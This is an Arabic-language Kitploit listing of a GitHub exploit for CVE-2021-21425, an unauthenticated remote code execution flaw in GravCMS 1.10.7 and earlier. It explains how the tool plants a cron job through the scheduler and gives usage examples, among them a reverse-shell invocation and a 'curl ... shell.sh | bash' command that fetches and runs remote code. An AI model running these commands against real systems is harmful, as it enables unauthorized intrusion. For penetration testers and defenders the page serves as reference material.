Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-21425 — CVE-2021-21425 - GravCMS 1.10.7 ثغرة RCE غير مصادق عليها عبر المجدول. استغلال محسّن مع وسائط CLI وترميز base64 تلقائي. | Kitploit
أدوات/GitHubGitHub/d4ytox/cve-2021-21425
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubd4ytox/cve-2021-21425

CVE-2021-21425

CVE-2021-21425 - GravCMS 1.10.7 ثغرة RCE غير مصادق عليها عبر المجدول. استغلال محسّن مع وسائط CLI وترميز base64 تلقائي.

عرض المستودع
1منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-21425 - GravCMS Unauthenticated RCE

ثغرة تنفيذ أوامر عن بعد غير مصادق عليها لـ GravCMS <= 1.10.7 عبر كتابة YAML عشوائية إلى المجدول.

هذه نسخة محسّنة من EDB-49973. يتطلب الاستغلال الأصلي تحريرًا يدويًا للقيم المضمنة في النص. هذه النسخة تضيف وسائط سطر أوامر مناسبة وتشفير تلقائي لـ base64 للحمولات.

التحسينات عن الأصل:

  • وسائط سطر أوامر للهدف و LHOST و LPORT
  • تشفير تلقائي لـ base64 لحمولة الصدفة العكسية
  • دعم أمر مخصص (-c)
  • معالجة أخطاء وإخراج حالة مناسبين

الثغرة

الحقلالقيمة
CVECVE-2021-21425
EDB-ID49973
المتأثرGravCMS <= 1.10.7
النوعUnauthenticated RCE
CVSS9.8 (حرجة)

يفشل إضافة Grav Admin في التحقق من المصادقة على بعض المسارات الإدارية، مما يسمح للمستخدمين غير المصادق عليهم بكتابة إعدادات YAML عشوائية. يستغل هذا الاستغلال إعدادات المجدول لإنشاء مهمة cron تنفذ كود PHP عشوائي.

الاستخدام

root@kitploit:~
# صدفة عكسية
python3 exploit.py -t http://target -s <LHOST> <LPORT>

# أمر مخصص
python3 exploit.py -t http://target -c "id"

أمثلة

root@kitploit:~
# الحصول على صدفة عكسية على الهدف
python3 exploit.py -t http://10.10.10.5 -s 10.10.14.5 4444

# تنفيذ أمر
python3 exploit.py -t http://grav.local:8080 -c "curl http://10.10.14.5/shell.sh | bash"

المتطلبات

root@kitploit:~
pip install requests

كيف يعمل

  1. يجلب /admin لاستخراج رمز admin-nonce (لا حاجة للمصادقة بسبب الثغرة)
  2. يرسل POST إلى /admin/config/scheduler مع إعداد مهمة cron خبيثة
  3. ينفذ المجدول حمولة PHP عبر /usr/bin/php -r eval(base64_decode(...))
  4. يكتب PHP الصدفة العكسية المفكوكة من base64 إلى /tmp/rev.sh وينفذها

تعمل مهمة cron كل دقيقة (* * * * *)، لذا تصل الصدفة خلال 60 ثانية.

الجدول الزمني

  • 2021-03-29 - تم الكشف عنها بواسطة Mehmet Ince
  • 2021-04-01 - تم إصلاحها في إضافة Grav Admin

المراجع

  • إدخال NVD
  • إشعار GitHub
  • ExploitDB
  • مدونة Pentest - Mehmet Ince

إخلاء مسؤولية

للاستخدام في الاختبارات الأمنية المصرح بها فقط. تأكد من الحصول على إذن كتابي قبل الاختبار على أي نظام.

تنزيل الأداة